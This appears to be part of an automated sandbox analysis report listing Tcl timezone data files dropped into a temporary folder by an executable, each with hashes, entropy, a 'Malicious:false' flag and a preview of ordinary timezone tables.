                                                                                                                                                                                                                                                    SHA-512:B8686E0D9FCF4783DF732676F5550EF30050CD20397086CE2DF77D935F64F02BAB8333C72D3B831627F322B9CF1289243E4B9E06BEB4F7668224B268E4CDF07A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Rio_Gallegos) {. {-9223372036854775808 -16612 0 LMT}. {-2372095388 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Salta

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1974
                                                                                                                                                                                                                                                    Entropy (8bit):3.957678973420544
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5VgfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRi:72JaGK9+LUlT/uXgeVL+PRjG3dUXHQ3T
                                                                                                                                                                                                                                                    MD5:9BC9148D20A804AB42732F1C13C28A1C
                                                                                                                                                                                                                                                    SHA1:910E54C41F70CB3F51A5DF08016FCFCFA1083921
                                                                                                                                                                                                                                                    SHA-256:262DFD69F14B658DC8B8786204973A225C4ABA8EDC2BF33B025B77BD97D1693C
                                                                                                                                                                                                                                                    SHA-512:65FD9E9464402683FB8C4D97A512D50A7F19A0D53BC6B5CA0B2A30739DC4745CC178ACD0A02019E1B4587096F30C917D3B8FE0D3ED1883014D7AF90FD6AFD0AA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Salta) {. {-9223372036854775808 -15700 0 LMT}. {-2372096300 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}. {

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\San_Juan

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2067
                                                                                                                                                                                                                                                    Entropy (8bit):3.965568294539527
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5jXufJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGws:14JaGK9+LUlT/uXgeVL+PRjG3dUXHv6B
                                                                                                                                                                                                                                                    MD5:C6CFB7423D26A86924BA8A86494A268D
                                                                                                                                                                                                                                                    SHA1:68EC28EE2B8EFCC72E0875F968FE616FB71ED217
                                                                                                                                                                                                                                                    SHA-256:09F1CE3527B5C3F8D58D79901B6129459D4DC1AEEF80F19338ECCF764668DFF3
                                                                                                                                                                                                                                                    SHA-512:7C4835FDA7AA229E3AABE27F9AA1D1724B4CA6537E58035E1D60CFB446944FBD33BC806B64224B20CDC3315F8C6AE6F34B55D5333E5857AF6A34AD124CEF343B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Juan) {. {-9223372036854775808 -16444 0 LMT}. {-2372095556 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\San_Luis

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2050
                                                                                                                                                                                                                                                    Entropy (8bit):3.978156963589212
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:58kfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRq:KaJaGK9+LUlT/uXgeVL+PRjG3dUXHLjG
                                                                                                                                                                                                                                                    MD5:06E53FBE0BC9E87886F7E1D8D940173A
                                                                                                                                                                                                                                                    SHA1:0AE7160A11FA8D8582384F5E397896B87F57FFA6
                                                                                                                                                                                                                                                    SHA-256:F8CD4695992301B29E64CCBD850A6D3185B6193C63846C28183B0A86B7C552D9
                                                                                                                                                                                                                                                    SHA-512:FF9F306998A27A89A7FFA9AB3116F984775E4EAD51B6C9C1666F7A462F04F85AA0141EDADF85D7DC2CA18599FFE9615C517C8C5CFBD0812B807B9CAD80E8054F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Luis) {. {-9223372036854775808 -15924 0 LMT}. {-2372096076 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Tucuman

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2067
                                                                                                                                                                                                                                                    Entropy (8bit):3.9614731054580163
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5yM9EfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGI:b96JaGK9+LUlT/uXgeVL+PRjG3dUXHQA
                                                                                                                                                                                                                                                    MD5:17200080F2840A40EEFB902AFFB858FF
                                                                                                                                                                                                                                                    SHA1:B33794EB96EE42C555B32A2CEDD27ABE0224C7BC
                                                                                                                                                                                                                                                    SHA-256:93B07C3BD7CE711650B3A21F413C7D5B952DAB03E0BAFAED687E676949A2EF6F
                                                                                                                                                                                                                                                    SHA-512:060C2860E356631B293EE3EAAF9D71FEEB07B7D0A42211859CB8E4B99A1C812BD9AF079A82D4E55771A78FBF591D6B0D25FDC54F8DA2D2F594F0E9B213EA271F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Tucuman) {. {-9223372036854775808 -15652 0 LMT}. {-2372096348 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Ushuaia

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2036
                                                                                                                                                                                                                                                    Entropy (8bit):3.9614879453725877
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:56YfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRB:QeJaGK9+LUlT/uXgeVL+PRjG3dUXHg6P
                                                                                                                                                                                                                                                    MD5:A254EF7A0166FBADB11644105C8E7BCA
                                                                                                                                                                                                                                                    SHA1:30E6C33FA28691857CB0ACA4DB4B465FEA31A84A
                                                                                                                                                                                                                                                    SHA-256:4E93A670621EBFD5FD996F8BC6C6C4121DE2D3CFAE221CB2A7C51C77428F99FF
                                                                                                                                                                                                                                                    SHA-512:A28CD45CB352CBCC27C8BAE7B3D176C61526B763394DAAF5FB7A779DB51603290E3C2A3A3D922B70AA19ABB80FA1E4EED501D591F9E111CD6C19093BDAF7B9AC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Ushuaia) {. {-9223372036854775808 -16392 0 LMT}. {-2372095608 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Aruba

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.760006229014668
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGE/nVIAcGE9Cvju:SlSWB9IZaM3y79CzVAIgp9CE290/V90J
                                                                                                                                                                                                                                                    MD5:84605CB5AC93D51FF8C0C3D46B6A566F
                                                                                                                                                                                                                                                    SHA1:8B56DBDAD33684743E5828EFBD638F082E9AA20D
                                                                                                                                                                                                                                                    SHA-256:680651D932753C9F9E856018B7C1B6D944536111900CB56685ABA958DE9EC9C1
                                                                                                                                                                                                                                                    SHA-512:A5FA747C4743130308A8D8832AD33CF10B2DA2F214DEE129CAC9543D6F88FF232B4387026976578D037DF7816D0F4177835866A35F497438DD2526FEBACA2AF6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Aruba) $TZData(:America/Curacao).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Asuncion

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7810
                                                                                                                                                                                                                                                    Entropy (8bit):3.766817466650462
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:5xEwkqiLgvyCZ1Q79FGs6R61Ec//nvRGoTcP5zzIhwrwsEW8dmsyoTrhxXrdCrQ3:5NBeQy
                                                                                                                                                                                                                                                    MD5:9981F5B3F787131FCB96169B8CAD19A6
                                                                                                                                                                                                                                                    SHA1:987B68F1597F932178E92F12D1A3431A923473D0
                                                                                                                                                                                                                                                    SHA-256:99D494C820C9DD238CFA13775C8B4D8D8B401BD2EADA65F8B46CC75369FAA9C9
                                                                                                                                                                                                                                                    SHA-512:763ACB02FDDA95065BE0C090FCF6BA7E515E97A6F33185E577F46C597C16B47653159EA0573ED1011B1F29979A0B9E94B9CA2BE688057BD231ECB35AA0399CD1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Asuncion) {. {-9223372036854775808 -13840 0 LMT}. {-2524507760 -13840 0 AMT}. {-1206389360 -14400 0 PYT}. {86760000 -10800 0 PYT}. {134017200 -14400 0 PYT}. {162878400 -14400 0 PYT}. {181368000 -10800 1 PYST}. {194497200 -14400 0 PYT}. {212990400 -10800 1 PYST}. {226033200 -14400 0 PYT}. {244526400 -10800 1 PYST}. {257569200 -14400 0 PYT}. {276062400 -10800 1 PYST}. {291783600 -14400 0 PYT}. {307598400 -10800 1 PYST}. {323406000 -14400 0 PYT}. {339220800 -10800 1 PYST}. {354942000 -14400 0 PYT}. {370756800 -10800 1 PYST}. {386478000 -14400 0 PYT}. {402292800 -10800 1 PYST}. {418014000 -14400 0 PYT}. {433828800 -10800 1 PYST}. {449636400 -14400 0 PYT}. {465451200 -10800 1 PYST}. {481172400 -14400 0 PYT}. {496987200 -10800 1 PYST}. {512708400 -14400 0 PYT}. {528523200 -10800 1 PYST}. {544244400 -14400 0 PYT}. {560059200 -10800 1 PYS

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Atikokan

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):332
                                                                                                                                                                                                                                                    Entropy (8bit):4.582750266902939
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X5290/qlfbm2OHvcFGxYP329V/uFn/TUs/uFn/lHIs8/kRm5/uFb/C/iin:MBp5290/emdHLYP323/uFn/9/uFn/dBs
                                                                                                                                                                                                                                                    MD5:66777BB05E04E030FABBC70649290851
                                                                                                                                                                                                                                                    SHA1:97118A1C4561FC1CC9B7D18EE2C7D805778970B8
                                                                                                                                                                                                                                                    SHA-256:2C6BBDE21C77163CD32465D773F6EBBA3332CA1EAEEF88BB95F1C98CBCA1562D
                                                                                                                                                                                                                                                    SHA-512:B00F01A72A5306C71C30B1F0742E14E23202E03924887B2418CA6F5513AE59E12BC45F62B614716BBE50A7BEA8D62310E1B67BB39B84F7B1B40C5D2D19086B7C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Atikokan) {. {-9223372036854775808 -21988 0 LMT}. {-2366733212 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-923248800 -18000 1 CDT}. {-880214400 -18000 0 CWT}. {-769395600 -18000 1 CPT}. {-765388800 -18000 0 EST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Atka

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):172
                                                                                                                                                                                                                                                    Entropy (8bit):4.761501750421919
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0/yO5pVAIg20/yOvYvt2IAcGE/ol7x+IAcGE/yOun:SlSWB9IZaM3y7/ykVAIgp/y9F290/ola
                                                                                                                                                                                                                                                    MD5:E641C6615E1EF015427202803761AADD
                                                                                                                                                                                                                                                    SHA1:E254129517335E60D82DFE00C6D5AF722D36565A
                                                                                                                                                                                                                                                    SHA-256:9C546927B107BB4AB345F618A91C0F8C03D8A366028B2F0FCBF0A3CE29E6588E
                                                                                                                                                                                                                                                    SHA-512:B7D34B1EA0D6722D7BFCD91F082D79EE009B97A2B5684D76A3F04CB59079637134275CF9A0306B9F4423A03CC0C2AB43994207D1B209161C893C2C6F3F3B6311
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Adak)]} {. LoadTimeZoneFile America/Adak.}.set TZData(:America/Atka) $TZData(:America/Adak).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Bahia

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1974
                                                                                                                                                                                                                                                    Entropy (8bit):3.912191186217954
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5CP+Ih+j+R+u+W+iW+M+A+r+hN+gU+Wt+x3+XG+M+Y+v+c+M+/2+v+ux+/+C+jZl:MP+2+j+R+u+W+L+M+A+r+L+v+Wt+h+25
                                                                                                                                                                                                                                                    MD5:6D2CD468DF52E8CA7B1B5578DE0B04C5
                                                                                                                                                                                                                                                    SHA1:AEC04A61823815EF0414E8A88C860F0BDB6F3190
                                                                                                                                                                                                                                                    SHA-256:BF7A9E732483DD1D3C7246B422A5B4CF3F496B001B70D60A9F510D84F14D9DDC
                                                                                                                                                                                                                                                    SHA-512:248520173EFFBD49506095AD7F9E4BC6B7D819187EEF2BD39A5F94AC92D8C8F26647BEBAFF5C9802ECA300CBF6BCCDD9D2E05E998457D7357238B89FA76A338B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia) {. {-9223372036854775808 -9244 0 LMT}. {-1767216356 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Bahia_Banderas

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6625
                                                                                                                                                                                                                                                    Entropy (8bit):3.791871111929614
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:NqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmbwBlhcCLfYkNRfsNz:NqZL/1dCYDDCxyH4RxGIJkYWXsWwav7S
                                                                                                                                                                                                                                                    MD5:6A18936EC3AA0FCEC8A230ADAF90FF1E
                                                                                                                                                                                                                                                    SHA1:B13B8BF1FD2EEED44F63A0DC71F0BCE8AC15C783
                                                                                                                                                                                                                                                    SHA-256:974481F867DEA51B6D8C6C21432F9F6F7D6A951EC1C34B49D5445305A6FB29B7
                                                                                                                                                                                                                                                    SHA-512:75AA7A3AE63ED41AFF6CF0F6DC3CA649786A86A64293E715962B003383D31A8AD2B99C72CE6B788EC4DFF1AF7820F011B3F1FD353B37C326EF02289CE4A061BF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia_Banderas) {. {-9223372036854775808 -25260 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Barbados

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):413
                                                                                                                                                                                                                                                    Entropy (8bit):4.429320498710922
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp5290eNJmdH9Gcvm/uFkCFP/K/uFkCFks/v/h/uFkCFFoI/qZ/uFkCF3dX/r:cQT7enmSkC9/KSkCT/BSkCLl/wSkCj/r
                                                                                                                                                                                                                                                    MD5:49EED111AB16F289E7D2D145A2641720
                                                                                                                                                                                                                                                    SHA1:2F0A37524209FC26421C2951F169B4352250ED9E
                                                                                                                                                                                                                                                    SHA-256:E7415944397EF395DDBD8EACB6D68662908A25E2DB18E4A3411016CBB6B8AFC6
                                                                                                                                                                                                                                                    SHA-512:3AD4511798BA763C4E4A549340C807FE2FDF6B107C74A977E425734BBADDFF44ADAA68B5AE1F96170902A10208BC4BBF551C596EB1A3E292071549B8F3012A35
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Barbados) {. {-9223372036854775808 -14309 0 LMT}. {-1451678491 -14309 0 BMT}. {-1199217691 -14400 0 AST}. {234943200 -10800 1 ADT}. {244616400 -14400 0 AST}. {261554400 -10800 1 ADT}. {276066000 -14400 0 AST}. {293004000 -10800 1 ADT}. {307515600 -14400 0 AST}. {325058400 -10800 1 ADT}. {338706000 -14400 0 AST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Belem

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1010
                                                                                                                                                                                                                                                    Entropy (8bit):4.083219722112219
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQYe3gqc+Ih+j+Dd+HO+W+iW+M+A+ph+h/1+ge5+Wt+x3+p+C:5VgP+Ih+j+R+u+W+iW+M+A+r+hN+gU+O
                                                                                                                                                                                                                                                    MD5:AA9BD809DCA209AFDF0D57752F6871F6
                                                                                                                                                                                                                                                    SHA1:7C05A9FC831584CB5B9082073284736D000E9D5D
                                                                                                                                                                                                                                                    SHA-256:4E8AC6FCDBC60264962D43B734A760A307C5E30D35A196289FDA8C87FC023B5C
                                                                                                                                                                                                                                                    SHA-512:47AB548EBF090CAE6E59464A7AC9348F0F505E9B7EB3DED24EB7C7F11BA6EB92BDDC3F99E4B7C77046C82B54D7FC4D44996D46869DA3BD326FD25944A492DFA7
                                                                                                                                                                                                                                                    Malicious:false
